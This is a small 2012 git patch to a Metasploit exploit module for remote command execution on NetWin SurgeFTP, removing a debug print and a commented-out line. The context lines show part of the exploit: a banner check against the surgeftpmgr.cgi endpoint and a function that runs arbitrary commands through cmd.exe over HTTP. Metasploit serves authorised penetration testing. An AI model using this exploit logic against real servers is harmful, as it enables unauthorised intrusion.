From 49248c79d686a5622b6d9327b1e3cf3b4c32a534 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 22:22:58 -0600 Subject: [PATCH] Oops, didn't mean to keep these lines --- modules/exploits/multi/http/netwin_surgeftp_exec.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index daafbdb326..e613dc6b3a 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -53,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'}) - print_line(Rex::Text.to_hex_dump(res.body)) if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/ return Exploit::CheckCode::Detected else @@ -63,7 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote def execute_command(cmd, opts) # Unfortunately we can't use env vars - #cmd = cmd.gsub(/\%TEMP\%\\/, 'C:\\') cmd = cmd.gsub(/\%TEMP\%\\/, datastore['FOLDER']) http_send_command("cmd.exe /q /c #{cmd}") end